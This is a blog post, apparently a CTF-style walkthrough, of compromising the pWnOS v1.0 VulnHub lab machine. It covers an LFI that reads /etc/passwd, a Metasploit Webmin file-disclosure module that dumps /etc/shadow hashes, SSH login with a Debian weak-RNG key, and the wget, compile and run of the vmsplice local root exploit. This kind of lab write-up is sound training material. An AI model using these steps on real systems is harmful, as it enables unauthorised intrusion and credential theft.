Core dump overflow

Core dump in progress...

Pentest lab - pWnOS

| Comments

I’ve decided on a goal for 2016 to pwn as many VulnHub boxes as I can, and train myself to reach a level where I can hopefully take the OSCP. So I scrolled back in the list of VMs to start with the older ones and move towards the newer ones. Today’s target is pWnOS v1.0, a vulnerable Linux machine that apparently contains multiple avenues for getting root

Recon

I fired Nmap as usual, to see what’s listening on the box:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@pwnbox:~#nmap -sT -sV 192.168.80.150

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-02-15 07:15 EST
Nmap scan report for 192.168.80.150
Host is up, received arp-response (0.00058s latency).
Not shown: 995 closed ports
Reason: 995 conn-refused
PORT      STATE SERVICE     REASON  VERSION
22/tcp    open  ssh         syn-ack OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp    open  http        syn-ack Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn syn-ack Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn syn-ack Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        syn-ack MiniServ 0.01 (Webmin httpd)
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Next, I looked at the web server, and here’s what I saw:

pwnos 1.0

Clicking next brought me to a not-so-typical help page:

help

No matter what skill level you choose, you will be taken to a mocking page with the text “HAHAHAHA! , for a n00b you REALLY SUCK!” (the n00b part comes from what you choose, so it will vary). I played a bit with the URL parameters, and when I modified http://192.168.80.150/index1.php?help=true&connect=true to connect=false, the server spit back some PHP errors:

1
2
3
Warning: include(false) [function.include]: failed to open stream: No such file or directory in /var/www/index1.php on line 18

Warning: include() [function.include]: Failed opening 'false' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/index1.php on line 18

Thinking LFI, I tried to read a file from the system: connect=../../../../etc/passwd. No filtering in place!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

Cool, it looks like obama, osama and yomama have been busy making accounts on this box!

I looked next at the Webmin server:

webmin

Tried logging in with the default credentials root/root, but it didn’t work. Time to search for some exploits!

Getting the /etc/shadow file

There is a file disclosure vulnerability for the Webmin server, available in Metasploit:

A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).

With it, I was able to pull the target’s /etc/shadow file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

   Name     Current Setting   Required  Description
   ----     ---------------   --------  -----------
   DIR      /unauthenticated  yes       Webmin directory path
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                      yes       The target address
   RPATH    /etc/passwd       yes       The file to download
   RPORT    10000             yes       The target port
   VHOST                      no        HTTP server virtual host


Auxiliary action:

   Name      Description
   ----      -----------
   Download  


msf auxiliary(file_disclosure) > set RPATH /etc/shadow
RPATH => /etc/shadow
msf auxiliary(file_disclosure) > run

[*] [2016.02.24-09:02:11] Attempting to retrieve /etc/shadow...
[*] [2016.02.24-09:02:11] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completed

From here you can crack the hashes with our pal, John the Ripper, but I won’t go into that, because a Nessus scan revealed a shorter route to hacking the target.

Exploit

The host is vulnerable to the Debian OpenSSH/OpenSSL Package Random Number Generator Weakness that allows bruteforcing with precalculated SSH keys. You can read more about it here, and also download the vulnerable keys. The vulnerability stems from the fact that the random data used by the algorithm is the PID of the process generating the key.

Using the earlier file disclosure module of Metasploit, it’s possible to search the contents of the .ssh/authorized_keys file for each user. I didn’t find anything for root, but obama has been in the house!

1
2
3
4
5
6
7
8
msf auxiliary(file_disclosure) > set RPATH /home/obama/.ssh/authorized_keys
RPATH => /home/obama/.ssh/authorized_keys
msf auxiliary(file_disclosure) > run

[*] [2016.02.29-05:02:52] Attempting to retrieve /home/obama/.ssh/authorized_keys...
[*] [2016.02.29-05:02:52] The server returned: 200 Document follows
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ== obama@ubuntuvm
[*] Auxiliary module execution completed

So we know obama’s public key, and we also have the vulnerable pregenerated keys that we downloaded earlier. So it’s possible to search for this public key among all those keys:

1
2
root@pwnbox:~/debian-ssh/common_keys/rsa/2048#grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ==
dcbe2a56e8cdea6d17495f6648329ee2-4679.pub

Great! A match has been found! I used to ssh on the box as obama (wouldn’t it be nice to be able to do this on an actual White House computer.. xD)

1
2
3
4
5
6
7
8
9
10
11
root@pwnbox:~/debian-ssh/common_keys/rsa/2048#ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.80.150
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Feb 29 04:44:43 2016 from 192.168.80.144
obama@ubuntuvm:~$

Privilege escalation

The kernel version of the system is outdated:

1
2
obama@ubuntuvm:~$ uname -a
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux

Googling it instantly brought some good news about vmsplice_to_pipe(), a local privilge escalation vulnerability that affects kernels prior to 2.6.24.2. And the source is available on ExploitDB. You can see that the author didn’t lack any imagination with the name of the source code file (read the first line, it’s hilarious) xD

Ok, back to business. I downloaded the file on the compromised box (had to use the —no-check-certificate option because I would get an error otherwise):

1
2
3
4
5
6
7
8
9
10
11
12
13
obama@ubuntuvm:~$ wget -O vmsplice.c https://www.exploit-db.com/download/5092 --no-check-certificate
--05:27:51--  https://www.exploit-db.com/download/5092
           => `vmsplice.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.mycloudproxy.com' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 6,293 (6.1K) [application/txt]

100%[============================================================================================================================>] 6,293         --.--K/s             

05:27:52 (1.07 GB/s) - `vmsplice.c' saved [6293/6293]

Compiled, and ran the code..and we are root!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
obama@ubuntuvm:~$ gcc -o vmsplice vmsplice.c
obama@ubuntuvm:~$ ./vmsplice 
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e4b000 .. 0xb7e7d000
[+] root
root@ubuntuvm:~# whoami
root

Challenge completed! :D

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
 _________________________________________
/ Q: How many IBM types does it take to   \
| change a light bulb? A: Fifteen. One to |
| do it, and fourteen to write document   |
| number                                  |
|                                         |
| GC7500439-0001, Multitasking            |
| Incandescent Source System Facility,    |
|                                         |
| of which 10% of the pages state only    |
| "This page intentionally                |
|                                         |
| left blank", and 20% of the definitions |
| are of the form "A:.....                |
|                                         |
| consists of sequences of non-blank      |
\ characters separated by blanks".        /
 -----------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

Comments